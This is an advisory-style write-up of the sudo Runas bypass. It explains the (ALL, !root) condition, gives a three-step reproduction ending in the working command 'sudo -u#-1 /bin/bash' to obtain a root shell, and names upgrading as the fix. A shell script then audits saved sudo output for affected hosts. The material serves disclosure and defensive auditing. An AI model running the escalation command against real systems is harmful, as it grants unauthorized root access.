Sudo could allow a local authenticated attacker to bypass security restrictions, caused by an issue with running commands with an arbitrary user ID. By using the ALL keyword in a Runas specification, an attacker could exploit this vulnerability to bypass security restrictions and execute arbitrary commands on the system with root privileges.
1. Find the version of sudo
- sudo --version
2. Check the current user's sudo privileges; a Runas specification of (ALL, !root) is the key condition
- sudo -l
3. Run this command to trick sudo into executing /bin/bash as root. You need the current user's password to authenticate to sudo
- sudo -u#-1 /bin/bash
Upgrade to the latest version of Sudo (1.8.28 or later), available from the Sudo Web site.
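The two checks above (version, then Runas list) can be run offline against saved output from many hosts. The script below is an added example, not code from the original page or from the Sudo project; the function names and sample text are constructed, and it generalizes the (ALL, !root) case to any Runas list that pairs ALL with a negated entry.

```sh
#!/bin/sh
# Added example: offline audit of saved `sudo --version` and `sudo -l`
# output for the condition described above. All names here are hypothetical.

FIXED_VERSION="1.8.28"   # first fixed release named in the remediation text

# Read `sudo --version` output on stdin; print e.g. "1.8.27" (pN suffix dropped).
parse_sudo_version() {
    sed -n 's/^Sudo version \([0-9][0-9.]*\).*/\1/p' | head -n 1
}

# Succeed (exit 0) when dotted version $1 is older than FIXED_VERSION.
# An empty (unparsed) version compares as 0.0.0, so it is treated as older.
version_is_affected() {
    awk -v v="$1" -v f="$FIXED_VERSION" 'BEGIN {
        split(v, a, "."); split(f, b, ".")
        for (i = 1; i <= 3; i++) {
            if (a[i] + 0 < b[i] + 0) exit 0
            if (a[i] + 0 > b[i] + 0) exit 1
        }
        exit 1   # equal to the fixed release: not affected
    }'
}

# Read `sudo -l` output or sudoers lines on stdin; print the lines whose Runas
# list pairs ALL with a negated entry, such as "(ALL, !root)".
find_excluding_runas() {
    grep -E '\(([^()]*,)?[[:space:]]*ALL[[:space:]]*(,[^()]*)?\)' |
        grep -E '\([^()]*![^()]*\)'
}

# audit_host VERSION_TEXT LIST_TEXT: print a verdict; exit 0 only when clean.
audit_host() {
    ver=$(printf '%s\n' "$1" | parse_sudo_version)
    hits=$(printf '%s\n' "$2" | find_excluding_runas || true)
    if [ -n "$hits" ] && version_is_affected "$ver"; then
        printf 'AFFECTED: sudo %s < %s with exclusion-based Runas:\n%s\n' \
            "$ver" "$FIXED_VERSION" "$hits"
        return 1
    fi
    printf 'OK: sudo %s\n' "$ver"
}

# Constructed sample input (not captured from a real host).
SAMPLE_VERSION='Sudo version 1.8.27
Sudoers policy plugin version 1.8.27'
SAMPLE_LIST='User alice may run the following commands on host1:
    (ALL, !root) /bin/bash'

audit_host "$SAMPLE_VERSION" "$SAMPLE_LIST" || true
```

A host is reported only when both conditions hold; an exclusion-based Runas list on a fixed version is still worth rewriting as an explicit allow-list of target users.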